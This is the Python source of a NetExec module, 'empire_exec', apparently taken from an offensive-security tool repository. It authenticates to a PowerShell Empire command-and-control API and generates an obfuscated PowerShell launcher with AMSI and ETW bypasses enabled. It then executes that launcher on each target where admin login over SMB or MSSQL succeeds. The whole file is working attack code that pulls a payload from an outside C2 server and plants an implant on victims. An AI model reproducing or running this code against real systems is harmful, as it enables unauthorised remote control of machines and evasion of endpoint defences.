NetExec/nxc/modules/empire_exec.py

134 lines
5.3 KiB
Python

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import requests
from requests import ConnectionError
class NXCModule:
"""
Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
Module by @byt3bl33d3r
"""
name = "empire_exec"
description = "Uses Empire's RESTful API to generate a launcher for the specified listener and executes it"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
LISTENER Listener name to generate the launcher for
SSL True if the listener is using SSL/TLS
OBFUSCATE True if you want to use the built-in Obfuscation (that calls Invoke-Obfuscate)
OBFUSCATE_CMD Override Invoke-Obfuscation command (Default is "Token,All,1" and is picked up by Defender)
"""
self.empire_launcher = None
if "LISTENER" not in module_options:
context.log.fail("LISTENER option is required!")
sys.exit(1)
api_proto = "https" if "SSL" in module_options else "http"
obfuscate = True if "OBFUSCATE" in module_options else False
# we can use commands instead of backslashes - this is because Linux and OSX treat them differently
default_obfuscation = "Token,All,1"
obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation
context.log.debug(f"Obfuscate: {obfuscate} - Obfuscate_cmd: {obfuscate_cmd}")
# Pull the host and port from the config file
base_url = f"{api_proto}://{context.conf.get('Empire', 'api_host')}:{context.conf.get('Empire', 'api_port')}"
context.log.debug(f"Empire URL: {base_url}")
# Pull the username and password from the config file
empire_creds = {
"username": context.conf.get("Empire", "username"),
"password": context.conf.get("Empire", "password"),
}
context.log.debug(f"Empire Creds: {empire_creds}")
try:
login_response = requests.post(
f"{base_url}/token",
data=empire_creds,
verify=False,
)
except ConnectionError as e:
context.log.fail(f"Unable to login to Empire's RESTful API: {e}")
sys.exit(1)
context.log.debug(f"Response Code: {login_response.status_code}")
context.log.debug(f"Response Content: {login_response.text}")
if login_response.status_code == 200:
access_token = login_response.json()["access_token"]
headers = {"Authorization": f"Bearer {access_token}"}
else:
context.log.fail("Error authenticating to Empire's RESTful API")
sys.exit(1)
data = {
"name": "nxc_ephemeral",
"template": "multi_launcher",
"options": {
"Listener": module_options["LISTENER"],
"Language": "powershell",
"StagerRetries": "0",
"OutFile": "",
"Base64": "True",
"Obfuscate": obfuscate,
"ObfuscateCommand": obfuscate_cmd,
"SafeChecks": "True",
"UserAgent": "default",
"Proxy": "default",
"ProxyCreds": "default",
"Bypasses": "mattifestation etw",
},
}
try:
stager_response = requests.post(
f"{base_url}/api/v2/stagers?save=False",
json=data,
headers=headers,
verify=False,
)
except ConnectionError:
context.log.fail("Unable to request stager from Empire's RESTful API")
sys.exit(1)
if stager_response.status_code not in [200, 201]:
if "not found" in stager_response.json()["detail"]:
context.log.fail(f"Listener {module_options['LISTENER']} not found")
else:
context.log.fail(f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}")
sys.exit(1)
context.log.debug(f"Response Code: {stager_response.status_code}")
# context.log.debug(f"Response Content: {stager_response.text}")
stager_create_data = stager_response.json()
context.log.debug(f"Stager data: {stager_create_data}")
download_uri = stager_create_data["downloads"][0]["link"]
download_response = requests.get(
f"{base_url}{download_uri}",
headers=headers,
verify=False,
)
context.log.debug(f"Response Code: {download_response.status_code}")
# context.log.debug(f"Response Content: {download_response.text}")
self.empire_launcher = download_response.text
if download_response.status_code == 200:
context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'")
else:
context.log.fail("Something went wrong when retrieving stager Powershell command")
def on_admin_login(self, context, connection):
if self.empire_launcher:
connection.execute(self.empire_launcher)
context.log.success("Executed Empire Launcher")